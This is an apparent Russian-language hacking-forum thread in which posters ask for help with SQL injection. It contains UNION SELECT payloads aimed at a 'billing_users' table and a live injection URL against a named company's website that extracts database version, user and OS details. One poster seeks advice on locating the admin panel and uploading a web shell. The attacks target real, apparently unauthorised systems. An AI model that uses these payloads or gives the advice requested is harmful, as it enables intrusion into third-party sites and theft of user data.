подскажите плиз по скуле. в общем подобрал все нужное и колво столбцов и имя таблицы. делаю запрос на несуществующее поле - вылетает ошибка (как положено) Ввожу запрос правильный (через скулю) он не выводит информацию из БД а тупо отображает то что было если бы я не вставлял скулю. ' UNION SELECT 1, login FROM billing_users LIMIT 0,1 -- выдает страницу без изменений ' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- A Database Error Occurred Error Number: 1054 Unknown column 'login1' in 'field list' SELECT login, email FROM billing_users WHERE login = '' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- ' OR email = '' То есть запрос вроде верный в 1ом случае а он ничего не выводит, ни на страницу, не в исходнике =( Это я так понимаю Blind SQL Injection и тут методом перебора только ? или как?

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+ file_priv:Y Не могу найти админку, phpmyadmin или ftp. Не могу прочитать файлы чтобы найти путь куда залить shell. Что можете посоветовать?

http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+

file_priv:Y

Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.

Что можете посоветовать?